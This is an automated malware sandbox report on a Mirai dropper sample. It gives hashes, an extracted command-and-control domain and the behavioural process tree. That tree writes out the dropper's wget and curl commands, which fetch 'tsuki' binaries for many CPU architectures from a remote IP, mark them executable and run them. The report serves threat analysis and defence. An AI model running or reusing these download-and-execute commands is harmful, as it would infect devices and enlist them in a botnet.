Analysis
-
max time kernel
37s -
max time network
65s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
22-07-2024 00:17
Static task
static1
Behavioral task
behavioral1
Sample
95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae
Resource
debian9-mipsbe-20240418-en
General
-
Target
95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae
-
Size
2KB
-
MD5
0cfdd05ea2bb11d74b3ce3b95fc29421
-
SHA1
665cc6ba414b286da9c1a41a618d843275fa53cc
-
SHA256
95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae
-
SHA512
8a0baf4405ad2462a4a735d4a2a84d8d0b9ef10b72261716e0afb985f280d93aac4f5e8e40a6da0d330264813a077f3a4216df862821022d2f9c3ea90147c120
Malware Config
Extracted
mirai
MIRAI
whois.hopto.org
Extracted
mirai
MIRAI
whois.hopto.org
Extracted
mirai
MIRAI
whois.hopto.org
Signatures
-
Executes dropped EXE 13 IoCs
Processes:
tsukitsukitsukitsukitsukitsukitsukitsukitsukitsukitsukitsukitsukiioc pid process /tmp/tsuki 701 tsuki /tmp/tsuki 733 tsuki /tmp/tsuki 763 tsuki /tmp/tsuki 780 tsuki /tmp/tsuki 793 tsuki /tmp/tsuki 807 tsuki /tmp/tsuki 816 tsuki /tmp/tsuki 824 tsuki /tmp/tsuki 830 tsuki /tmp/tsuki 838 tsuki /tmp/tsuki 843 tsuki /tmp/tsuki 848 tsuki /tmp/tsuki 854 tsuki -
Checks CPU configuration 1 TTPs 13 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads runtime system information 26 IoCs
Reads data from /proc virtual filesystem.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 22 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetwgetcurlcurlcurlcurlwgetcurlcurlwgetcurlcurlcurl95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435caecurlwgetwgetcurlcurlwgetwgetcurldescription ioc process File opened for modification /tmp/tsuki.ppc wget File opened for modification /tmp/tsuki.sh4 wget File opened for modification /tmp/tsuki.sh4 curl File opened for modification /tmp/tsuki.arm5 curl File opened for modification /tmp/tsuki.mpsl curl File opened for modification /tmp/tsuki.arm7 curl File opened for modification /tmp/tsuki.m68k wget File opened for modification /tmp/tsuki.m68k curl File opened for modification /tmp/tsuki.spc curl File opened for modification /tmp/tsuki.mips wget File opened for modification /tmp/tsuki.ppc curl File opened for modification /tmp/tsuki.i686 curl File opened for modification /tmp/tsuki.x86 curl File opened for modification /tmp/tsuki 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae File opened for modification /tmp/tsuki.mips curl File opened for modification /tmp/tsuki.mpsl wget File opened for modification /tmp/tsuki.arm wget File opened for modification /tmp/tsuki.arm curl File opened for modification /tmp/tsuki.arm6 curl File opened for modification /tmp/tsuki.arm7 wget File opened for modification /tmp/tsuki.x86 wget File opened for modification /tmp/tsuki.arc curl
Processes
-
/tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae/tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae1⤵
- Writes file to tmp directory
PID:668 -
/usr/bin/wgetwget http://176.123.2.219/bins/tsuki.x862⤵
- Writes file to tmp directory
PID:670 -
/usr/bin/curlcurl -O http://176.123.2.219/bins/tsuki.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:697 -
/bin/catcat tsuki.x862⤵PID:698
-
/bin/chmodchmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.x862⤵PID:700
-
/tmp/tsuki./tsuki payload2⤵
- Executes dropped EXE
PID:701 -
/usr/bin/wgetwget http://176.123.2.219/bins/tsuki.mips2⤵
- Writes file to tmp directory
PID:705 -
/usr/bin/curlcurl -O http://176.123.2.219/bins/tsuki.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:720 -
/bin/catcat tsuki.mips2⤵PID:730
-
/bin/chmodchmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.mips tsuki.x862⤵PID:731
-
/tmp/tsuki./tsuki payload2⤵
- Executes dropped EXE
PID:733 -
/usr/bin/wgetwget http://176.123.2.219/bins/tsuki.mpsl2⤵
- Writes file to tmp directory
PID:736 -
/usr/bin/curlcurl -O http://176.123.2.219/bins/tsuki.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:752 -
/bin/catcat tsuki.mpsl2⤵PID:761
-
/bin/chmodchmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.mips tsuki.mpsl tsuki.x862⤵PID:762
-
/tmp/tsuki./tsuki payload2⤵
- Executes dropped EXE
PID:763 -
/usr/bin/wgetwget http://176.123.2.219/bins/tsuki.arm2⤵
- Writes file to tmp directory
PID:765 -
/usr/bin/curlcurl -O http://176.123.2.219/bins/tsuki.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:766 -
/bin/catcat tsuki.arm2⤵PID:777
-
/bin/chmodchmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.arm tsuki.mips tsuki.mpsl tsuki.x862⤵PID:778
-
/tmp/tsuki./tsuki payload2⤵
- Executes dropped EXE
PID:780 -
/usr/bin/wgetwget http://176.123.2.219/bins/tsuki.arm52⤵PID:781
-
/usr/bin/curlcurl -O http://176.123.2.219/bins/tsuki.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:785 -
/bin/catcat tsuki.arm52⤵PID:790
-
/bin/chmodchmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.arm tsuki.arm5 tsuki.mips tsuki.mpsl tsuki.x862⤵PID:791
-
/tmp/tsuki./tsuki payload2⤵
- Executes dropped EXE
PID:793 -
/usr/bin/wgetwget http://176.123.2.219/bins/tsuki.arm62⤵PID:794
-
/usr/bin/curlcurl -O http://176.123.2.219/bins/tsuki.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:800 -
/bin/catcat tsuki.arm62⤵PID:804
-
/bin/chmodchmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.mips tsuki.mpsl tsuki.x862⤵PID:806
-
/tmp/tsuki./tsuki payload2⤵
- Executes dropped EXE
PID:807 -
/usr/bin/wgetwget http://176.123.2.219/bins/tsuki.arm72⤵
- Writes file to tmp directory
PID:808 -
/usr/bin/curlcurl -O http://176.123.2.219/bins/tsuki.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:813 -
/bin/catcat tsuki.arm72⤵PID:814
-
/bin/chmodchmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.x862⤵PID:815
-
/tmp/tsuki./tsuki payload2⤵
- Executes dropped EXE
PID:816 -
/usr/bin/wgetwget http://176.123.2.219/bins/tsuki.ppc2⤵
- Writes file to tmp directory
PID:817 -
/usr/bin/curlcurl -O http://176.123.2.219/bins/tsuki.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:818 -
/bin/catcat tsuki.ppc2⤵PID:819
-
/bin/chmodchmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x862⤵PID:821
-
/tmp/tsuki./tsuki payload2⤵
- Executes dropped EXE
PID:824 -
/usr/bin/wgetwget http://176.123.2.219/bins/tsuki.m68k2⤵
- Writes file to tmp directory
PID:826 -
/usr/bin/curlcurl -O http://176.123.2.219/bins/tsuki.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:827 -
/bin/catcat tsuki.m68k2⤵PID:828
-
/bin/chmodchmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x862⤵PID:829
-
/tmp/tsuki./tsuki payload2⤵
- Executes dropped EXE
PID:830 -
/usr/bin/wgetwget http://176.123.2.219/bins/tsuki.spc2⤵PID:832
-
/usr/bin/curlcurl -O http://176.123.2.219/bins/tsuki.spc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:835 -
/bin/catcat tsuki.spc2⤵PID:836
-
/bin/chmodchmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x862⤵PID:837
-
/tmp/tsuki./tsuki payload2⤵
- Executes dropped EXE
PID:838 -
/usr/bin/wgetwget http://176.123.2.219/bins/tsuki.i6862⤵PID:839
-
/usr/bin/curlcurl -O http://176.123.2.219/bins/tsuki.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:840 -
/bin/catcat tsuki.i6862⤵PID:841
-
/bin/chmodchmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x862⤵PID:842
-
/tmp/tsuki./tsuki payload2⤵
- Executes dropped EXE
PID:843 -
/usr/bin/wgetwget http://176.123.2.219/bins/tsuki.sh42⤵
- Writes file to tmp directory
PID:844 -
/usr/bin/curlcurl -O http://176.123.2.219/bins/tsuki.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:845 -
/bin/catcat tsuki.sh42⤵PID:846
-
/bin/chmodchmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x862⤵PID:847
-
/tmp/tsuki./tsuki payload2⤵
- Executes dropped EXE
PID:848 -
/usr/bin/wgetwget http://176.123.2.219/bins/tsuki.arc2⤵PID:850
-
/usr/bin/curlcurl -O http://176.123.2.219/bins/tsuki.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:851 -
/bin/catcat tsuki.arc2⤵PID:852
-
/bin/chmodchmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arc tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x862⤵PID:853
-
/tmp/tsuki./tsuki payload2⤵
- Executes dropped EXE
PID:854
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
/tmp/tsukiFilesize
98KB
MD56cf78b3572c325d809ad4677c2ebd6a2
SHA1be2f27c2b001f981344e52333568cb0dc7ffe7ad
SHA256c6603610d98124953b9b6e4355611cb0588507a8a003aff36771937b43e2acd0
SHA512bcb15e53b55134cefcf8de2c0fd28fee6154dc63bc053007f581cec3bc024052b663eed5ce2f3eea3c3b7749d2f4e7a5b0ed013c489bc1c28755d82bebea8a24
-
/tmp/tsukiFilesize
99KB
MD52cf4b7e9a6fa11dbff627fc7aeee3f97
SHA10cbc6d981a4d7ce2650ebe9aba5ec89a8377fefb
SHA256eb2c0d50d32ebf8d18e82dd780c2432f4010e5dd8f0cc84c04a10f03f8399a6d
SHA51218272662786616a679ed85164c4fa7fe2a865f8c4eedde57403f8fd197c34b356ff3a62155ea9069f2e1f172c4545c29db4c3144c9932f90bdea5a4f14141f57
-
/tmp/tsukiFilesize
90KB
MD53cd8418ac8f414def6727fe141d328b9
SHA1dc61b74e9e08ff3208ee96a6c94f8247e6196b99
SHA256cbe3077abc42c9e725ee561b8e369c9e5b3819d762d8fa9889b27c1e10dfb8b3
SHA51298d72d05b5b65fac98ed3b448ebf73786040da5aebbe56c060781f78638e75e62ad8801618874c4c17c13cd59bab93f58a31b565a350ac118257d2a0a21409b9
-
/tmp/tsukiFilesize
213B
MD5eeed291445ee3e6bac53540dfd6cd91c
SHA1afc1907c25cf19a1ecf3e83fcd1f7cc72d085f41
SHA25643953e23b49d467cd6b2e40603c2465769cd1620706ef52fecc71777f9964f78
SHA512ee610ac06ef742dbf5b616c72b30a32b64a2873272cbf297367de20563bf405b183842fb5e2012f29d5ee11e6ee10e97a90ec915ffb659f22439f7c1ca21d283
-
/tmp/tsukiFilesize
164KB
MD5adf30c84e4d1a741bb51593fa750d624
SHA1ca52225d16c403e9e6ab662e8dab63496281945d
SHA25696de1caeeddeba6420add3efbba3e360a13b9956a32be4ee1d4464129154e806
SHA5129ce9154a018aa53c49403c1919cb223f066821a22a9692cbb1defd185098842d8ded4f0a3f17cd6017367ea1357c41295c9f199d1148998f7283f511244db846
-
/tmp/tsuki.x86Filesize
76KB
MD5f60ada8b79c2232773b9c08868c1c5fb
SHA18752a84f5cc638e0a87ffa7bb28d4a9661fcbefa
SHA2562d1fd93daf8cadaf775a8cd4e21f8b7b1759442bd260eb6dde3aee319adae117
SHA51271fe4806ac06da9a8d704bbabcc7dc7d0d7e087b420ea81923c888f0f8836b455e790899504729611e883e597a31c5eb7298c4cd5f442117cc799f98102eb9e8